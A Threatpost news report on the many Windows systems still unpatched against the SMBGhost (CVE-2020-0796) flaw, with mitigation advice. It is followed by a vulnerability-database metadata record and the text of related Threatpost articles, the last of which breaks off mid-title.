Microsoft’s SMBGhost Flaw Still Haunts 108K Windows Systems

2020-10-28T20:36:09

Description

More than 100,000 Windows systems have not yet been updated to protect against a previously-patched, critical and wormable flaw in Windows called SMBGhost. Microsoft patched the remote code-execution (RCE) flaw bug tracked as [CVE-2020-0796 back in March](<https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>); it affects Windows 10 and Windows Server 2019, and ranks 10 out of 10 on the CVSS scale. It exists in version 3.1.1 of the Microsoft Server Message Block (SMB) protocol, the same protocol that was targeted by the infamous [WannaCry ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) in 2017. “I’m unsure what method Shodan uses to determine whether a certain machine is vulnerable to SMBGhost, but if its detection mechanism is accurate, it would appear that there are still over 103,000 affected machines accessible from the internet,” Jan Kopriva, one of the researchers at the SANS Internet Storm Center, said in a [post on Wednesday](<https://isc.sans.edu/forums/diary/SMBGhost+the+critical+vulnerability+many+seem+to+have+forgotten+to+patch/26732/>). [![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) According to Kopriva, many of these vulnerable systems (22 percent) are in Taiwan, Japan (20 percent), Russia (11 percent) and the U.S. (9 percent). Microsoft released its fix, KB4551762, as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909). In lieu of a patch, Microsoft in March had noted that administrators can use PowerShell to disable SMBv3 compression, which will block unauthenticated attackers from exploiting the vulnerability against an SMBv3 server. To protect clients from outside attacks, it’s necessary to block TCP port 445 at the enterprise perimeter firewall. Kopriva for his part also tracked a percentage of all IPs with an open port 445 via Shodan, and found that overall approximately 8 percent of all IPs have port 445 open. The chart below shows the number of vulnerable systems that are open to SMBGhost. Kopriva noted in a message to Threatpost that the “dips” in the data are presumably caused by Shodan re-scanning a large number of IP ranges. [![SMBGhost Shodan detections](https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/28154313/0-1.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/28154313/0-1.png>) IP addresses detected as vulnerable to SMBGhost by Shodan. Credit: Jan Kopriva The pressure is on for system administrators to patch their systems against SMBGhost, with various proof of concepts (PoCs) for the flaw being released over the past few months. While many attempts to exploit SMBGhost resulted only in denial of service or local privilege escalation, a PoC released in June by someone who goes by “Chompie,” who announced [his exploit](<https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md>) to achieve RCE on Twitter. “Since release of this PoC was again met with wide attention from the media, one might reasonably expect that by now, most of the vulnerable machines would have been patched – especially those accessible from the internet,” according to Kopriva. These PoCs have also [spurred the Department of Homeland Security](<https://techxplore.com/news/2020-06-homeland-windows-worm.html>) to urge companies to update in June, saying that cybercriminals are targeting the unpatched systems: The agency “strongly recommends using a firewall to block server message block ports from the internet and to apply patches to critical- and high-severity vulnerabilities as soon as possible.”

{"id": "THREATPOST:38C104BCE62E9E24AEFF60D68D7C50BE", "type": "threatpost", "bulletinFamily": "info", "title": "Microsoft\u2019s SMBGhost Flaw Still Haunts 108K Windows Systems", "description": "More than 100,000 Windows systems have not yet been updated to protect against a previously-patched, critical and wormable flaw in Windows called SMBGhost.\n\nMicrosoft patched the remote code-execution (RCE) flaw bug tracked as [CVE-2020-0796 back in March](<https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>); it affects Windows 10 and Windows Server 2019, and ranks 10 out of 10 on the CVSS scale. It exists in version 3.1.1 of the Microsoft Server Message Block (SMB) protocol, the same protocol that was targeted by the infamous [WannaCry ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) in 2017.\n\n\u201cI\u2019m unsure what method Shodan uses to determine whether a certain machine is vulnerable to SMBGhost, but if its detection mechanism is accurate, it would appear that there are still over 103,000 affected machines accessible from the internet,\u201d Jan Kopriva, one of the researchers at the SANS Internet Storm Center, said in a [post on Wednesday](<https://isc.sans.edu/forums/diary/SMBGhost+the+critical+vulnerability+many+seem+to+have+forgotten+to+patch/26732/>).\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nAccording to Kopriva, many of these vulnerable systems (22 percent) are in Taiwan, Japan (20 percent), Russia (11 percent) and the U.S. (9 percent).\n\nMicrosoft released its fix, KB4551762, as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\nIn lieu of a patch, Microsoft in March had noted that administrators can use PowerShell to disable SMBv3 compression, which will block unauthenticated attackers from exploiting the vulnerability against an SMBv3 server. To protect clients from outside attacks, it\u2019s necessary to block TCP port 445 at the enterprise perimeter firewall. Kopriva for his part also tracked a percentage of all IPs with an open port 445 via Shodan, and found that overall approximately 8 percent of all IPs have port 445 open.\n\nThe chart below shows the number of vulnerable systems that are open to SMBGhost. Kopriva noted in a message to Threatpost that the \u201cdips\u201d in the data are presumably caused by Shodan re-scanning a large number of IP ranges.\n\n[![SMBGhost Shodan detections](https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/28154313/0-1.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/28154313/0-1.png>)\n\nIP addresses detected as vulnerable to SMBGhost by Shodan. Credit: Jan Kopriva\n\nThe pressure is on for system administrators to patch their systems against SMBGhost, with various proof of concepts (PoCs) for the flaw being released over the past few months. While many attempts to exploit SMBGhost resulted only in denial of service or local privilege escalation, a PoC released in June by someone who goes by \u201cChompie,\u201d who announced [his exploit](<https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md>) to achieve RCE on Twitter.\n\n\u201cSince release of this PoC was again met with wide attention from the media, one might reasonably expect that by now, most of the vulnerable machines would have been patched \u2013 especially those accessible from the internet,\u201d according to Kopriva.\n\nThese PoCs have also [spurred the Department of Homeland Security](<https://techxplore.com/news/2020-06-homeland-windows-worm.html>) to urge companies to update in June, saying that cybercriminals are targeting the unpatched systems: The agency \u201cstrongly recommends using a firewall to block server message block ports from the internet and to apply patches to critical- and high-severity vulnerabilities as soon as possible.\u201d\n", "published": "2020-10-28T20:36:09", "modified": "2020-10-28T20:36:09", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/", "reporter": "Lindsey O'Donnell", "references": ["https://threatpost.com/wormable-unpatched-microsoft-bug/153632/", "https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/", "https://isc.sans.edu/forums/diary/SMBGhost+the+critical+vulnerability+many+seem+to+have+forgotten+to+patch/26732/", "https://threatpost.com/newsletter-sign/", "https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/28154313/0-1.png", "https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md", "https://techxplore.com/news/2020-06-homeland-windows-worm.html"], "cvelist": ["CVE-2020-0796"], "lastseen": "2020-10-28T20:46:14", "viewCount": 557, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:BBE7670A93BC8AF70B2207E0CEF64EAA"]}, {"type": "attackerkb", "idList": ["AKB:27DB2819-5039-4831-815A-798764488B88", "AKB:72CB57AD-D32C-43D3-86B8-F8B617707C5B", "AKB:E85583CB-111D-4D95-80E5-4CD53BB1F952", "AKB:ED05CA72-27C8-4C22-BFF9-2AE3451C549C"]}, {"type": "avleonov", "idList": ["AVLEONOV:24538B1ED96269982136AA43998E5780", "AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "AVLEONOV:D8BE9238C3E35C438BC4D8515D78E548"]}, {"type": "canvas", "idList": ["SMBGHOST", "SMBGHOST_LPE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6D8B0D86C2C5A86632676E10E471547F"]}, {"type": "cert", "idList": ["VU:872016"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0136"]}, {"type": "cisa", "idList": ["CISA:2584F925B4D0F34C7EBE8E9D34FC72C7", "CISA:50FD88CEEFDE175A266C8EB09AC92D7D", "CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "CISA:9D38592E642AD30FA4BC435AC4FFC304"]}, {"type": "cve", "idList": ["CVE-2020-0796"]}, {"type": "exploitdb", "idList": ["EDB-ID:48216", "EDB-ID:48267", "EDB-ID:48537"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:162FCF5EA0445C77E29A0F6775C5E7F6", "EXPLOITPACK:CFD5A967D4C18FB68D3D775FE9AAAA38"]}, {"type": "githubexploit", "idList": ["0522E1EF-0AC6-5DD5-A6DA-6BF91F5A89C4", "1B787DF3-D66A-5A51-AB8B-DA600B216482", "1D1C90C4-5D8F-58C4-B5AA-805F46862E47", "22C095F3-54B6-532B-AE10-73BEE3624D57", "23687103-A800-5907-929B-B3A41D121F1B", "243C313B-7F90-56EA-BE8E-35A8DFFAEDB2", "2C47C88A-DA77-535C-9BCD-4A89D8B02384", "2F2D8C81-E148-5A14-8750-9403AFEB21A8", "387719E9-0938-5546-95DA-D88EC7E3FF13", "484522F4-99E8-5FCE-9CB6-2DB46070E529", "4A6EBCA8-D007-5E59-94B8-7BDA780D94B5", "52AA3134-2731-589A-BE46-26ABB8039FE2", "5FB67B52-8BE9-5EE4-B573-CF49FD1579A5", "6F29B32B-8480-51E3-8B87-96FBE89C9ADD", "709F50E2-7719-5BDB-ABBF-7CF8A820C46F", "7B8853FF-7CB4-5F4D-B185-FE434458F43D", "935331CB-5C0B-5059-BAC4-383651C26C94", "9B986515-0778-5365-8693-2669FC74128A", "A0F56F7F-FBEC-52A7-8D05-19E0EF3E860F", "BDCD16BE-ECED-5F2A-994A-FBF6539639ED", "C8967016-587F-5098-AD59-ED5BF752FD5A", "D4A83665-CEF3-5877-9DA4-B03A23BF7461", "D6044381-6C6F-56BC-81B3-86E4B5FC5200", "D7ADE5F6-D414-5DF2-AEC2-92FB32E6041F", "DE92AD9C-F346-5416-A5F0-5AEC963C9F3B", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "FA0B4B9E-5D12-55F9-9E66-FA9CF9AF1B72"]}, {"type": "kaspersky", "idList": ["KLA11693"]}, {"type": "kitploit", "idList": ["KITPLOIT:1370442080181927541", "KITPLOIT:3348929726444940519", "KITPLOIT:3440136498125856121", "KITPLOIT:3701426813255055656", "KITPLOIT:3872284907466902606", "KITPLOIT:4378915690459298496", "KITPLOIT:5374829754140275290", "KITPLOIT:5857572574369273543", "KITPLOIT:6298886136201302065", "KITPLOIT:6714457792986818120", "KITPLOIT:7720212798779518234", "KITPLOIT:7904361679234881900", "KITPLOIT:8455936192163161094"]}, {"type": "krebs", "idList": ["KREBS:1093D39181F7F724932AED0E8DA017A8", "KREBS:A05C5DFD2D31CCAAE49C4FBA8C7469E4"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0796_SMBGHOST-", "MSF:EXPLOIT-WINDOWS-SMB-CVE_2020_0796_SMBGHOST-"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:ADV200005", "MS:CVE-2020-0796"]}, {"type": "mskb", "idList": ["KB4551762"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:7DAEE35F7BA48355264AFE712E62E793", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62202097543"]}, {"type": "nessus", "idList": ["MICROSOFT_SMB_CVE-2020-0796.NASL", "SMB_MICROSOFT_WINDOWS_ADV200005.NASL", "SMB_MICROSOFT_WINDOWS_ADV200005_REMOTE.NASL", "SMB_NT_MS20_MAR_4551762.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310816800"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156732", "PACKETSTORM:157110"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:016288CBC518BC4CE318130A921071C2", "QUALYSBLOG:22A5C3C4F56D3B499B24DF2E1626F4C1", "QUALYSBLOG:9B7C3806B8C67809B298463FBE31A0A4"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:614648646663CF660156AD39ED9421B3", "RAPID7BLOG:D560044511D0D460EB8BD73E6B8C9EB7", "RAPID7BLOG:E36C557104ECB6E144C21C3C499B0492"]}, {"type": "securelist", "idList": ["SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": "talosblog", "idList": ["TALOSBLOG:136C0DF46D16B7D21DD712BDD956BC41"]}, {"type": "thn", "idList": ["THN:17F11846886656062FA1EA84D1C74534", "THN:882595A940E5AB15E8B9C472154ACA45", "THN:90048C5D2E69F2E769EE053B3E1555AA", "THN:F1DFBF3E8E6E5F3CD1282E08B3C3E35D"]}, {"type": "threatpost", "idList": ["THREATPOST:0EAD358006302B8EB3637C22334E13DC", "THREATPOST:12364EEB82CF1DBF8D357DF9FBB64126", "THREATPOST:1586A7AFAD80F6833B8727AD8E03DB79", "THREATPOST:2AAD8D184B893593E4E3B11FE31F97B3", "THREATPOST:A7995232CE91305C94B84BB400B1EA34", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B2D0023D9A73CEE9C328A0927149D5B2", "THREATPOST:EC36CC2F4E891C402B4EBDBE9D92F9A8", "THREATPOST:F7C6EEE7081716FAE624B70FD91C4225"]}, {"type": "zdt", "idList": ["1337DAY-ID-34097", "1337DAY-ID-34105", "1337DAY-ID-34171", "1337DAY-ID-34206", "1337DAY-ID-34504"]}]}, "score": {"value": 0.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:27DB2819-5039-4831-815A-798764488B88", "AKB:E85583CB-111D-4D95-80E5-4CD53BB1F952", "AKB:ED05CA72-27C8-4C22-BFF9-2AE3451C549C"]}, {"type": "avleonov", "idList": ["AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "AVLEONOV:D8BE9238C3E35C438BC4D8515D78E548"]}, {"type": "canvas", "idList": ["SMBGHOST", "SMBGHOST_LPE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6D8B0D86C2C5A86632676E10E471547F"]}, {"type": "cert", "idList": ["VU:872016"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0136"]}, {"type": "cisa", "idList": ["CISA:2584F925B4D0F34C7EBE8E9D34FC72C7", "CISA:50FD88CEEFDE175A266C8EB09AC92D7D", "CISA:9D38592E642AD30FA4BC435AC4FFC304"]}, {"type": "cve", "idList": ["CVE-2020-0796"]}, {"type": "exploitdb", "idList": ["EDB-ID:48216", "EDB-ID:48267", "EDB-ID:48537"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:CFD5A967D4C18FB68D3D775FE9AAAA38"]}, {"type": "githubexploit", "idList": ["0522E1EF-0AC6-5DD5-A6DA-6BF91F5A89C4", "1B787DF3-D66A-5A51-AB8B-DA600B216482", "1D1C90C4-5D8F-58C4-B5AA-805F46862E47", "22C095F3-54B6-532B-AE10-73BEE3624D57", "23687103-A800-5907-929B-B3A41D121F1B", "243C313B-7F90-56EA-BE8E-35A8DFFAEDB2", "2C47C88A-DA77-535C-9BCD-4A89D8B02384", "2F2D8C81-E148-5A14-8750-9403AFEB21A8", "387719E9-0938-5546-95DA-D88EC7E3FF13", "484522F4-99E8-5FCE-9CB6-2DB46070E529", "4A6EBCA8-D007-5E59-94B8-7BDA780D94B5", "52AA3134-2731-589A-BE46-26ABB8039FE2", "5FB67B52-8BE9-5EE4-B573-CF49FD1579A5", "6F29B32B-8480-51E3-8B87-96FBE89C9ADD", "709F50E2-7719-5BDB-ABBF-7CF8A820C46F", "7B8853FF-7CB4-5F4D-B185-FE434458F43D", "935331CB-5C0B-5059-BAC4-383651C26C94", "A0F56F7F-FBEC-52A7-8D05-19E0EF3E860F", "BDCD16BE-ECED-5F2A-994A-FBF6539639ED", "C8967016-587F-5098-AD59-ED5BF752FD5A", "D4A83665-CEF3-5877-9DA4-B03A23BF7461", "D6044381-6C6F-56BC-81B3-86E4B5FC5200", "D7ADE5F6-D414-5DF2-AEC2-92FB32E6041F", "DE92AD9C-F346-5416-A5F0-5AEC963C9F3B", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "FA0B4B9E-5D12-55F9-9E66-FA9CF9AF1B72"]}, {"type": "kaspersky", "idList": ["KLA11693"]}, {"type": "kitploit", "idList": ["KITPLOIT:1370442080181927541", "KITPLOIT:3348929726444940519", "KITPLOIT:3440136498125856121", "KITPLOIT:3872284907466902606", "KITPLOIT:4378915690459298496", "KITPLOIT:5374829754140275290", "KITPLOIT:5857572574369273543", "KITPLOIT:6298886136201302065", "KITPLOIT:6714457792986818120", "KITPLOIT:7720212798779518234", "KITPLOIT:7904361679234881900", "KITPLOIT:8455936192163161094"]}, {"type": "krebs", "idList": ["KREBS:1093D39181F7F724932AED0E8DA017A8", "KREBS:A05C5DFD2D31CCAAE49C4FBA8C7469E4"]}, {"type": "mmpc", "idList": ["MMPC:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "mscve", "idList": ["MS:ADV200005", "MS:CVE-2020-0796"]}, {"type": "mskb", "idList": ["KB4551762"]}, {"type": "mssecure", "idList": ["MSSECURE:7DAEE35F7BA48355264AFE712E62E793", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "myhack58", "idList": ["MYHACK58:62202097543"]}, {"type": "nessus", "idList": ["MICROSOFT_SMB_CVE-2020-0796.NASL", "SMB_MICROSOFT_WINDOWS_ADV200005_REMOTE.NASL", "SMB_NT_MS20_MAR_4551762.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310816800"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156732", "PACKETSTORM:157110"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:016288CBC518BC4CE318130A921071C2", "QUALYSBLOG:22A5C3C4F56D3B499B24DF2E1626F4C1", "QUALYSBLOG:9B7C3806B8C67809B298463FBE31A0A4"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:614648646663CF660156AD39ED9421B3"]}, {"type": "securelist", "idList": ["SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": "talosblog", "idList": ["TALOSBLOG:136C0DF46D16B7D21DD712BDD956BC41"]}, {"type": "thn", "idList": ["THN:17F11846886656062FA1EA84D1C74534", "THN:882595A940E5AB15E8B9C472154ACA45", "THN:90048C5D2E69F2E769EE053B3E1555AA", "THN:F1DFBF3E8E6E5F3CD1282E08B3C3E35D"]}, {"type": "threatpost", "idList": ["THREATPOST:0EAD358006302B8EB3637C22334E13DC", "THREATPOST:12364EEB82CF1DBF8D357DF9FBB64126", "THREATPOST:1586A7AFAD80F6833B8727AD8E03DB79", "THREATPOST:A7995232CE91305C94B84BB400B1EA34", "THREATPOST:B2D0023D9A73CEE9C328A0927149D5B2", "THREATPOST:EC36CC2F4E891C402B4EBDBE9D92F9A8", "THREATPOST:F7C6EEE7081716FAE624B70FD91C4225"]}, {"type": "zdt", "idList": ["1337DAY-ID-34097", "1337DAY-ID-34105", "1337DAY-ID-34171"]}]}, "exploitation": null, "vulnersScore": 0.9}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1659955260}, "_internal": {"score_hash": "e8ee441c6d051c5e1fdac80568b88cbc"}}

{"threatpost": [{"lastseen": "2020-03-13T13:12:19", "description": "UPDATE\n\nMicrosoft released an emergency out-of-band patch to fix a SMBv3 wormable bug on Thursday that leaked earlier this week. The a patch for the vulnerability, tracked as CVE-2020-0796, is now rolling out to Windows 10 and Windows Server 2019 systems worldwide, according to Microsoft.\n\nOn Wednesday Microsoft warned of a wormable, unpatched remote code-execution vulnerability in the Microsoft Server Message Block protocol \u2013 the same protocol that was targeted by the infamous WannaCry ransomware in 2017. Microsoft released its fix, [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>), the following day as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\nThe critical bug affects Windows 10 and Windows Server 2019, and was not included in Microsoft\u2019s [Patch Tuesday release](<https://threatpost.com/microsoft-patches-bugs-march-update/153597/>) this week.\n\nThe bug can be found in version 3.1.1 of Microsoft\u2019s SMB file-sharing system. SMB allows multiple clients to access shared folders and can provide a rich playground for malware when it comes to lateral movement and client-to-client infection. This was played out in version 1 of SMB back in 2017, when the [WannaCry ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) used the NSA-developed [EternalBlue SMB exploit](<https://threatpost.com/scanner-shows-eternalblue-vulnerability-unpatched-on-thousands-of-machines/126818/>) to self-propagate rapidly around the world.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nIn this case, \u201cto exploit the vulnerability against an SMB server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server,\u201d Microsoft explained [in its advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200005#ID0EN>), issued Wednesday. \u201cTo exploit the vulnerability against an SMB client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it.\u201d\n\nMicrosoft issued its advisory only after details of the bug were published online by Cisco Talos and Fortinet. The firms\u2019 disclosure was an apparent miscommunication with Microsoft \u2013 both posts have since been taken down.\n\nAccording to [Duo Security](<https://duo.com/decipher/microsoft-advisory-warns-of-smbv3-flaw>), Fortinet had described the issue as a \u201cBuffer Overflow Vulnerability in Microsoft SMB Servers\u201d and said it could be used to execute arbitrary code within the context of the application. Cisco Talos meanwhile warned that a \u201cwormable\u201d attack would be able to exploit the vulnerability to \u201cmove from victim to victim.\u201d\n\nThreatpost reached out to both firms for additional details. Cisco Talos told Threatpost, \u201cOn March 10, information on an in-process effort was inadvertently posted and then promptly deleted from the Talos blog because it was not finalized. As a matter of policy, we do not discuss research that has not yet been approved for public disclosure. We are aware that this may have caused some confusion and will follow up when we have more to offer.\u201d\n\nWhile the bug is dangerous, researchers said this bug likely won\u2019t lead to \u201cWannaCry 2.0.\u201d\n\n\u201cConsidering that SMBv3 is not as widely used as SMBv1, the potential immediate impact of this threat is most likely lower than past vulnerabilities,\u201d Richard Melick, senior technical product manager at Automox, told Threatpost. \u201cBut that does not mean organizations should be disregarding any endpoint hardening that can happen now while Microsoft works on a patch\u2026it\u2019s better to respond today and disable SMBv3 and block TCP port 445. Respond now and vulnerabilities end today.\u201d\n\nJake Williams, founder of security firm Rendition Security, [said on Twitter](<https://twitter.com/MalwareJake/status/1237512617817751552>) that the risk of exploitation is mitigated by kernel protections \u2013 specifically kernel address space layout randomization (KASLR). KASLR randomly arranges the address space positions of key data areas of a given process. It essentially means that an attacker can\u2019t establish one attack path and use it over and over again.\n\n\u201cCore SMB sits in kernel space and KASLR is great at mitigating exploitation,\u201d tweeted Williams. \u201cAssuming this is kernel space, any unsuccessful exploitation results in [the blue screen of death] BSOD.\u201d He added, \u201cEven with trigger code, you still have to remotely bypass KASLR (not an easy task). If you need proof, [look at BUCKEYE](<https://symantec-blogs.broadcom.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit>). They had the EternalBlue trigger, but had to chain it with another information disclosure vulnerability to gain code execution. This isn\u2019t easy.\u201d\n\nSo far, there\u2019s no evidence that the vulnerability had been exploited in the wild, Microsoft said in the advisory. However, Melick said to proceed with caution.\n\n\u201cThere are still too many unknowns to say how effective this wormable vulnerability could be; is it going to be as easy as EternalBlue to implement or will it have the same difficulties as BlueKeep?\u201d Melick noted \u2013 the latter in reference to the [wormable bug](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) disclosed last year that some feared would lead to another WannaCry-level event. Exploits for BlueKeep however have so far [fallen well short](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) of researchers\u2019 initial fears.\n\nIn lieu of a patch, Microsoft on Wednesday noted that administrators can use PowerShell to disable SMBv3 compression, which will block unauthenticated attackers from exploiting the vulnerability against an SMBv3 server.\n\nTo protect clients from outside attacks, it\u2019s necessary to block TCP port 445 at the enterprise perimeter firewall.\n\n\u201cTCP port 445 is used to initiate a connection with the affected component,\u201d Microsoft noted. \u201cBlocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. This can help protect networks from attacks that originate outside the enterprise perimeter. Blocking the affected ports at the enterprise perimeter is the best defense to help avoid internet-based attacks.\u201d\n\nHowever, systems could still be vulnerable to attacks from within the enterprise perimeter \u2013 so once attackers penetrate the corporate network, they could use an exploit to move around in an unfettered way. Microsoft has published [general guidelines](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) to prevent lateral connections.\n\n**_Interested in security for the Internet of Things and how 5G will change things? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n\n_(This article was updated March 12 with the news that Microsoft has released a patch for CVE-2020-0796)_\n", "cvss3": {}, "published": "2020-03-11T17:13:53", "type": "threatpost", "title": "Wormable, Unpatched Microsoft Bug Threatens Corporate LANs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-11T17:13:53", "id": "THREATPOST:EC36CC2F4E891C402B4EBDBE9D92F9A8", "href": "https://threatpost.com/wormable-unpatched-microsoft-bug/153632/?utm_source=rss&utm_medium=rss&utm_campaign=wormable-unpatched-microsoft-bug", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-04-11T11:41:40", "description": "Marcus Hutchins, the researcher hailed for squashing the WannaCry ransomware outbreak in May 2017, has been spared jail time over the creation of the infamous Kronos banking malware.\n\nThe 25-year-old British researcher was sentenced on Friday to time served and one year of supervised release over charges relating to the creation of the Kronos malware, [according to reports](<https://twitter.com/emptywheel/status/1154806457189175301>).\n\nThe sentencing of Hutchins, known for his online Twitter name and blog \u2018MalwareTech,\u2019 has drawn international interest as the researcher has been hailed as a hero for his part in stopping the global [WannaCry outbreak in 2017](<https://threatpost.com/wannacry-bitcoin-withdrawn-killswitch-researcher-detained-in-nevada/127182/>). He was detained not long after in August 2017.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cSentenced to time served! Incredibly thankful for the understanding and leniency of the judge, the wonderful character letter you all sent, and everyone who helped me through the past two years, both financially and emotionally,\u201d the researcher said on his Twitter account after the sentencing.\n\n> Sentenced to time served! Incredibly thankful for the understanding and leniency of the judge, the wonderful character letter you all sent, and everyone who helped me through the past two years, both financially and emotionally.\n> \n> \u2014 MalwareTech (@MalwareTechBlog) [July 26, 2019](<https://twitter.com/MalwareTechBlog/status/1154820057085677570?ref_src=twsrc%5Etfw>)\n\nHutchins was [indicted](<https://threatpost.com/wannacry-hero-arrested-one-of-two-charged-with-distribution-of-kronos-malware/127186/>) in 2017 and charged with writing the [Kronos malware](<https://threatpost.com/kronos-banking-trojan-resurfaces-after-years-of-silence/134364/>), a banking trojan first discovered in 2014 that is capable of stealing credentials and using web injects for banking websites. Hutchins and another individual whose name was redacted from the original indictment, allegedly advertised the malware for sale on a number of internet forums, including the dismantled [AlphaBay](<https://threatpost.com/us-european-law-enforcement-shutter-massive-alphabay-market/126947/>) market.\n\nHutchins filed a [plea agreement](<https://www.documentcloud.org/documents/5972658-Marcus-Hutchins-plea-agreement.html>) in April pleading guilty to charges relating to the creation of the Kronos malware. The [plea agreement ](<https://threatpost.com/wannacry-hero-pleads-guilty-to-kronos-malware-charges/143997/>)admitted guilt to two of 10 counts in the Eastern District of Wisconsin on Friday \u2013 one charge for distributing Kronos and the other charge for conspiracy.\n\nOn the heels of his plea agreement, Hutchins faced up to 10 years in prison and $500,000 in fines, according to court documents.\n\nAfter Hutchins was first detained August 2017 in Nevada \u2013 a week after attending Black Hat and DEF CON \u2013 [reaction](<https://threatpost.com/marcus-hutchins-only-certainty-is-uncertainty/127270/>) to his arrest was mixed. The U.K. malware researcher has been hailed by many as the so-called \u201cWannaCry Hero\u201d because he discovered a way to knock down the WannaCry [ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) just as it had started to rapidly spread, infecting at least 200,000 systems and bringing global businesses to a halt.\n\nHutchins was hailed as a hero during the global [WannaCry outbreak in 2017](<https://threatpost.com/wannacry-bitcoin-withdrawn-killswitch-researcher-detained-in-nevada/127182/>). His analysis of the ransomware uncovered a hardcoded killswitch domain that the malware beaconed out to. Hutchins\u2019 purchased the domain for around $10 and by doing so likely spared the U.S. from suffering significant impact at the hands of WannaCry.\n\nWannaCry is blamed for infecting more than 200,000 endpoints in 150 countries, causing billions of dollars in damages and grinding global business to a halt.\n", "cvss3": {}, "published": "2019-07-29T13:23:34", "type": "threatpost", "title": "\u2018WannaCry Hero\u2019 Avoids Jail Time in 